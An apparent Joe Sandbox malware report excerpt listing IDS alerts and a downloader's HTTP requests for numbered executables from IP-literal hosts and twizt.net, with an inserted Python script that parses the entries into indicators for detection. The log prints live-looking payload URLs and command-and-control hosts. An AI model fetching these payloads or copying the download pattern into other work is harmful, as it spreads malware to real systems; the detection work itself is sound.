    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49603 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 185.215.113.66:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49632 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49624 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49630 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49613 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49600 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49654 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49601 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49628 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49674 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49592 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49639 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49595 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49687 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49605 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49625 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49658 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49594 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49686 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49598 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49662 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49591 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49659 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49644 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49661 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49618 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49611 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49641 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49692 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49633 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49622 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49607 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49649 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49693 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49695 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49697 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49673 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49647 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49650 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49689 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49642 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49652 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49656 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49690 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49684 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49645 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49682 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49676 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49615 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49620 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49587 -> 45.93.20.18:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49627 -> 91.202.233.141:80
    Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49671 -> 91.202.233.141:80
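The Suricata alert lines above and the HTTP request lines that follow are the evidence a responder turns into indicators and a detection. The Python below is an added example, not part of the Joe Sandbox report and not code from the Phorpiex sample: it parses report entries of both kinds (the sample lines are constructed in the shape of the entries on this page and are only a subset; field separators are added for readability and the regular expressions also accept the run-together form in which the page renders them), counts distinct TCP flows per destination and Suricata SID, and flags the loader's payload-fetch pattern seen here: a GET for a bare numeric path, with or without `.exe`, sent to a host written as an IP literal under a browser User-Agent. The numeric-path rule and the flow counting are this example's own assumptions; they are not what ETPRO rule 2803274 itself matches on.

```python
import re
import ipaddress
from collections import Counter

# Constructed sample lines in the shape of the Joe Sandbox report entries on
# this page (a subset). Separators were added for readability; the regexes
# below also accept the run-together form, see the last line.
SAMPLE_LINES = [
    "Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49589 -> 45.93.20.18:80",
    "Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 91.202.233.141:80",
    "Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49608 -> 91.202.233.141:80",
    "Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 185.215.113.66:80",
    "Source: global traffic | HTTP traffic detected: GET /newtpp.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | Host: twizt.net",
    "Source: global traffic | HTTP traffic detected: GET /peinstall.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: twizt.net",
    "Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141",
    "Source: global traffic | HTTP traffic detected: GET /1.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141",
    "Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18",
    # One line exactly as the report text renders it, fields run together.
    "Source: global trafficHTTP traffic detected: GET /12.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141",
]

ALERT_RE = re.compile(
    r"Suricata IDS: (?P<sid>\d+) - Severity (?P<sev>\d+) - (?P<msg>.+?) : "
    r"(?P<src>\d{1,3}(?:\.\d{1,3}){3}):(?P<sport>\d+) -> "
    r"(?P<dst>\d{1,3}(?:\.\d{1,3}){3}):(?P<dport>\d+)"
)
# Tolerates both "HTTP/1.1 | User-Agent: ... | Host: x" and "HTTP/1.1User-Agent: ...Host: x".
REQUEST_RE = re.compile(
    r"HTTP traffic detected: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]"
    r".*?User-Agent: (?P<ua>.*?)\s*\|?\s*Host: (?P<host>[^\s|]+)"
)
# Assumed rule for the secondary-payload fetches seen in this report: /1, /2, ..., /12.exe.
NUMERIC_PAYLOAD_PATH = re.compile(r"^/\d+(?:\.exe)?$")


def parse_alerts(lines):
    """Suricata entries as dicts with sid, sev, msg, src, sport, dst, dport."""
    return [m.groupdict() for m in (ALERT_RE.search(l) for l in lines) if m]


def parse_requests(lines):
    """HTTP request entries as dicts with method, path, ua, host."""
    return [m.groupdict() for m in (REQUEST_RE.search(l) for l in lines) if m]


def is_ip_literal(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def is_downloader_request(req):
    """GET of a bare numeric path (optionally .exe) from a host given as an IP literal."""
    return (req["method"] == "GET"
            and is_ip_literal(req["host"])
            and NUMERIC_PAYLOAD_PATH.match(req["path"]) is not None)


def flows_per_destination(alerts):
    """Distinct source ports (one per TCP flow) per (sid, 'dst:port')."""
    seen, counts = set(), Counter()
    for a in alerts:
        key = (a["sid"], f'{a["dst"]}:{a["dport"]}')
        if (key, a["sport"]) not in seen:
            seen.add((key, a["sport"]))
            counts[key] += 1
    return counts


def chrome_version(ua):
    m = re.search(r"Chrome/[\d.]+", ua)
    return m.group(0) if m else "other"


def summarize(lines):
    alerts, requests = parse_alerts(lines), parse_requests(lines)
    flagged = [r for r in requests if is_downloader_request(r)]
    return {
        "flows": flows_per_destination(alerts),
        "download_urls": sorted({f'http://{r["host"]}{r["path"]}' for r in flagged}),
        # Hostname-based C2 is listed rather than matched by the numeric-path rule.
        "c2_hosts": sorted({r["host"] for r in requests if not is_ip_literal(r["host"])}),
        # Several hard-coded browser versions in one session is itself a fingerprint.
        "user_agents": sorted({chrome_version(r["ua"]) for r in requests}),
    }


if __name__ == "__main__":
    s = summarize(SAMPLE_LINES)
    for (sid, dst), n in s["flows"].most_common():
        print(f"SID {sid} -> {dst}: {n} flows")
    print("payload URLs:", *s["download_urls"], sep="\n  ")
    print("hostname C2:", s["c2_hosts"])
    print("UA versions seen:", s["user_agents"])
```

Run as a script it prints the per-destination flow counts and the payload URL list; feeding it the whole report text, one entry per line, yields the full indicator set. The twizt.net requests (`/newtpp.exe`, `/peinstall.php`) are reported under `c2_hosts` rather than by the numeric-path rule, and the three different Chrome version strings in a single session are worth keeping as a fingerprint: one real browser does not change its major version between requests.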
    Source: global traffic | HTTP traffic detected: GET /newtpp.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | Host: twizt.net
    Source: global traffic | HTTP traffic detected: GET /peinstall.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: twizt.net
    Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /1.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /2.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /3.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /4.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /5.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /6.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /7.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /8.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /9.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /10.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /11.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 45.93.20.18
    Source: global traffic | HTTP traffic detected: GET /12.exe HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 | Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
    Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 45.93.20.18
